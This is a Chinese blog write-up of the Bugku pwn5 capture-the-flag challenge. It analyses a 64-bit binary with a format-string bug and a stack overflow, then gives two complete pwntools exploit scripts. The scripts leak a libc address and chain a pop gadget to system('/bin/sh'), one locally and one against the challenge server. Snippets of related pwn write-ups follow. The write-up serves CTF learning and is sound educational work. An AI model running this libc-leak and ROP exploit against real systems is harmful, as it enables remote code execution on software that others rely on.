Bugku pwn5 WP

最新推荐文章于 2023-08-20 16:21:31 发布
最新推荐文章于 2023-08-20 16:21:31 发布
阅读量946 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AcSuccess/article/details/104391287
版权
本文详细解析了一种利用栈溢出和格式化字符串漏洞的技术,通过IDA分析程序,发现两次read操作和printf函数中的漏洞。利用gdb调试技巧,泄露__libc_start_main地址,确定libc版本,进而找到system函数和/bin/sh字符串地址,实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下载地址

url

checksec

[*] '/mnt/hgfs/ubuntu_share/pwn/bugku/human'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA分析

  • 很多同学会发现,自己的IDA上全是字符串的地址,不是汉字
  • 像下面这样

  • 这时可以双击任意一个地址,我用的是byte_400978
  • 然后将一整块地址内容全选,单击右键
  • 就会有相应的汉字,点击就可以进行转换

分析程序
  • 发现两次read,第一次读8个字节,第二次读入0x40个字节(第二次存在栈溢出)
  • printf存在字符串格式化漏洞
  • 断点断在printf处,gdb调试

  • 在红框处发现了__libc_start_main的地址
  • 先将其泄露出来,然后查找libc版本
  • 在栈上是第6个位置,再加上6个寄存器,也就是printf函数的第12个参数,格式化字符串中应该填11
  • 之后根据libc版本查找system函数和/bin/sh字符串地址进行利用
填写的padding中还必须包括鸽子和真香两个词,不然程序直接exit(0)
  • 百度告诉我一个字占两个字节,四个字也就是8个字节,但在实际的debug中,却占了12个字节

确定libc版本

  • 使用泄露出地址的最后12位,使用该网站
  • 进行查询偏移

编写Exp

from pwn import *
from LibcSearcher import *

context.log_level = "DEBUG"

sh = process("human")
#sh = remote("114.116.54.89", 10005)

payload = "%11$p"

sh.recv()

sh.sendline(payload)

#sh.recvline()

#print sh.recv()

libc_addr = sh.recvline()

#print "asdasd:" + libc_addr

libc_addr = int(libc_addr[2:14],16)

print "libc_main_start_addr is:" + hex(libc_addr)

#libc = LibcSearcher("__libc_start_main", libc_addr)

#libc_base = libc_addr - libc.dump("__libc_start_main")

libc_base = libc_addr - 0x020830

system_addr = libc_base + 0x045390

binsh_addr = libc_base + 0x18cd57

gezi = "鸽子"

zhenxiang = "真香"

pop_addr = 0x0000000000400933

payload = gezi + zhenxiang + 'a' * 28 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)

sh.recvuntil("人类还有什么本质?")

sh.sendline(payload)

sh.interactive()

注意

  • 服务器端IO和本地IO之间可能有区别
  • 我在本地打得通,但服务器就打不通了
  • 原因是服务器比本地多发送了一个回车字符
  • 多写一个recv(1)就好了
from pwn import *
from LibcSearcher import *

context.log_level = "DEBUG"

#sh = process("human")
sh = remote("114.116.54.89", 10005)

payload = "%11$p"

sh.recv()

sh.sendline(payload)

sh.recv(1)

#print sh.recv()

libc_addr = sh.recvline()

#print "asdasd:" + libc_addr

libc_addr = int(libc_addr[2:14],16)

print "libc_main_start_addr is:" + hex(libc_addr)

#libc = LibcSearcher("__libc_start_main", libc_addr)

#libc_base = libc_addr - libc.dump("__libc_start_main")

libc_base = libc_addr - 0x020830

system_addr = libc_base + 0x045390

binsh_addr = libc_base + 0x18cd57

gezi = "鸽子"

zhenxiang = "真香"

pop_addr = 0x0000000000400933

payload = gezi + zhenxiang + 'a' * 28 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)

sh.recvuntil("人类还有什么本质?")

sh.sendline(payload)

sh.interactive()
bugku pwn5(格式化字符串漏洞)
weixin_45097188的博客
10-09 1573
检查程序开启了哪些保护及位数 没有开始栈保护 读程序 发现没有system和bin/sh两个后门,需要返回到libc,但是有__libc_start_main函数,可以通过这个函数计算libc的基地址。 libc_start_main的偏移=0x28/8+6=11 思路:栈上格式化漏洞配合栈溢出漏洞,首先利用格式化泄漏libc地址,然后栈溢出执行system(’/bin/sh’) 利用pwn4...
bugku-pwn-wp
令则
03-27 504
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
Bugku pwn5
BengDouLove的博客
02-28 622
我怀着沉重的心情写这个blog,在我做出这道题之前费劲了千辛万苦,花了三天时间,思考加发呆加询问… 菜就不用说了。 好好记录一下吧。 代码中存在格式化字符串漏洞,具体运行起来是这样 这是第一个坑,%x与%p是有区别的,x输出四个字节,p输出八个字节,这是64位的程序,所以地址应该大于四个字节了。 之前一直用的%x最后泄露出来的地址不对,也很难发现。 (菜+1) 为什么是%11$p呢,这要从pri...
Pwn5-bugku
yeshen4328的专栏
10-11 288
pwn5 基础知识 格式化字符串漏洞: 在c/c++的格式化输出中,使用的是printf函数,它的参数如下所示: int printf(const char *format, ...); 使用方式如下: char buf[10] = {}; read(0,buf,9); printf("%s",buf); 如果直接使用printf输出buf的话,则存在格式化字符串漏洞: char buf[10] = {}; read(0,buf,9); printf("%s",buf); 原理:因为printf会
pwn5 - bugku
SkYe's Blog
11-02 884
pwn5 - bugku 本文并未真正意义上的writeup,因为我无法成功复现???只是单纯记录一下,做题笔记 首先看一下保护,只开了NX。 没有危险函数,如system、getshell等 main函数中的变量s,在read函数时可以造成溢出。当中的if条件是限制程序的第二次输入必须包含真香、鸽子两个字符串。 当中的重点是printf存在格式化字符串漏洞,我们可以从这里读取到main函...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4446
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 598
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2595
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku-pwn5(萌新版)
TedLau的博客
05-02 815
补充一些点便于理解
bugku pwn5
Ceciiiilia的博客
04-18 393
1、有字符串格式化漏洞,通过该漏洞可以打印出栈里rip上libc_start_main的真实地址(需要算出偏移) 2、有libc_start_main的真实地址,即找到该地址在lib表内相对于lib_base真实地址的偏移,及system和bin/sh相对于libc_base的偏移 3、lib_base_addr加上system在lib表中的偏移,即可找到system的真实地址,lib_bas...
[BUGKU] [PWN] PWN5
Stan冲冲冲
05-18 447
[BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行一次都会变) 在windows里把pwn2拉入64位ida 按F5切换到伪C 发现乱码,修改配置文件后ALT+A全部选上UTF-8,再按一次F5,中文就可以显示了 int __cdecl main(int argc, const char **argv, const char **envp) { char
bugku pwn5(栈溢出)
weixin_44954083的博客
12-11 995
查看保护机制: 这个开了nx保护,堆栈不可以执行 拉到ida看一下: 这道题没有binsh和system两个后门,所以这个需要libc地址,在main函数看到了libc_start_main函数,这里需要得到libc_base地址,通过真实地址-偏移地址 这里得到是真实地址, 0x7ffff7a2d830-240=‘0x7ffff7a2d740’ 通过真实地址后面三位不变可以去得到偏移地...
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 1022
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
第五空间-PWN5
shidaofu的博客
09-15 208
国际惯例 无脑 IDA 思路 WP 总结
pwn羊城杯2024wp
最新发布
02-19
x = int(line[3:5], 16) y = int(line[6:8], 16) if x > 127: x -= 256 if y > 127: y -= 256 posx += x posy += y btn_flag = int(line[0:2], 16) # 解析按钮标志位 if btn_flag != 0: # 如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

西杭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值